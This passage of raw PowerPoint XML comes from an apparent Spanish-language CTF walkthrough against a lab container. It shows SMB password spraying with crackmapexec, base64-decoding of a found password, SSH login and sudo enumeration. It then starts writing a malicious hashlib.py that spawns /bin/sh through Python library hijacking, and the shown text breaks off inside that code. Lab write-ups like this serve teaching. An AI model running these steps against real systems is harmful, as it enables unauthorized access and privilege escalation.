            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Lo abrimos y muestra una serie de episodios de la temporada 1, sin espacio.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Lo tomamos como posibles contraseñas tanto por formato como por relación con los supuestos usuarios ya descubiertos.</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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s-ES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E4E47C8C-F2D1-4534-A87B-23E93F36F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9854" y="4380155"/>
            <a:ext cx="3621338" cy="1365622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Marcador de contenido 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A02EDB-EFB7-45C3-B7EE-43C0FA0D26A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209854" y="1917004"/>
            <a:ext cx="3651821" cy="2152075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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C4E24BBA-EE12-4661-89E2-BF9AF7B0B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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23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280122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C5285A-9597-4611-AD47-C06EA0A0E9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b="1" dirty="0"/>
              <a:t>Enumeración SMB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28BC742-CD3D-43A9-AB11-88374EA3328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r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Jon, se corresponde con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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seacercaelinvierno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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crackmapexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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172.17.0.2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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u”psw.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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” -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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p”psw.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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”</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> //172.17.0.2/shared -U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nano </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proteccion_del_reino</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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El mensaje principal a transportar por aria está cifrado.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Asimismo está la propia contraseña de jon para su usuario local. Descodificamos. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 contraseña del usuario jon es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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hijodelanister</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo aGlqb2RlbGFuaXN0ZXI= | base64 -4 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526E8A22-E1AC-443B-B9D1-1ED53509D6E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080760" y="2392888"/>
            <a:ext cx="5326606" cy="601247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ADA8D3BD-D79C-477B-BFBF-6685BD15E3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0760" y="3221662"/>
            <a:ext cx="5401524" cy="847417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0DDBFC14-4C2D-4734-B651-395FBA0A3D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9" y="4387993"/>
            <a:ext cx="5688479" cy="327441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CFC47D28-E878-489A-8164-B6CA309E49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3858" y="5040242"/>
            <a:ext cx="4170025" cy="487722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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C20A57C-CFD9-42FF-A033-DD54F1B44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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>24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519749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ABCC66-6B91-4334-A5FA-4A3E184616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b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> jon@172.17.0.2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647E888-220A-4A49-AE20-13E1C1E5BF4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es-ES" sz="3400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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La probamos y confirma que accedimos al usuario jon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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jon@172.17.0.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Listamos lo que tiene jon, lo que nos da un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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paraJon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 si listamos los directorios y archivos ocultos, nos muestra más.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="3400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Abrimos el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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paraJon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 Nos indica que los mensajes se codifican al introducirlos en una herramienta. Dicha herramienta está en poder de jon pero oculta.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ES" sz="3400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nano </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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paraJon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3400" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight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s-E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s-ES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C70B0078-5BCD-42D0-9239-D30FC67890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4122" y="1862389"/>
            <a:ext cx="3206154" cy="1242219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Marcador de contenido 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123E0BAC-396B-462A-BC15-EB56DF4505B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t="42199"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6628706" y="3402239"/>
            <a:ext cx="2536986" cy="1333679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3CE400B6-5D95-41CE-939E-EF3E465933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0053" y="5033549"/>
            <a:ext cx="5401524" cy="347502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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2FF1489F-A196-4717-8F17-8025E711B4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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>25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247805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075A87F-9429-4062-B51C-D5FC07CE1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b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> jon@172.17.0.2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2A294C8-6AFF-4D4E-912A-94397C33E06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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Volvemos a listar los ocultos y dado que todo trata de llevar un mensaje suponemos que puede tratarse del .mensaje.py.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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–la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Lo abrimos para comprobar su funcionamiento.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Nos muestra que es un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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que aplica hash 256. Más relevante es que importa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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hashlib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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getpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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.mensaje.py</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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8EA350E3-D46D-4718-8989-456A19B8D7C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678706" y="1878524"/>
            <a:ext cx="3973024" cy="1800412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70E311D2-B4CD-42EA-B26C-83A4ABAFF6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8706" y="3797265"/>
            <a:ext cx="3897412" cy="2642083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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78DA26A-7EE2-4624-853C-D2EFE6F6D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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>26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57963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15FA18-2C9B-46C0-B827-D8FA80D57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b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> jon@172.17.0.2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D0DEC36-B8B0-4C1A-B8EB-8BEA1E965A1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ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Como jon, vemos los permisos sudo posibles, a la hora de escalar privilegios.  De hecho comprobamos que tenemos solo uno y muy concreto.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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La potestad de ejecutar sin necesidad de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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como el propio usuario aria, a través de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 el .mensaje.py del usuario jon.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ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo -l.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ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Crearemos el módulo malicioso hashlib.py;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Este reemplaza el proceso real por una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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interactiva;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Le daremos permisos de lectura y ejecución.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069DFF3A-1EE6-4E8C-8075-8BBD97DFDE9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267450" y="3676980"/>
            <a:ext cx="4754563" cy="493782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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288CE83-11B0-427B-A7D1-470BB1E045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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>27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769715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15FA18-2C9B-46C0-B827-D8FA80D57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b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> jon@172.17.0.2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D0DEC36-B8B0-4C1A-B8EB-8BEA1E965A1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25000" lnSpcReduction="20000"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ES" sz="6400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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&gt; /home/jon/hashlib.py &lt;&lt;'PY'</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="6400" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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os</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="6400" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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os.execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
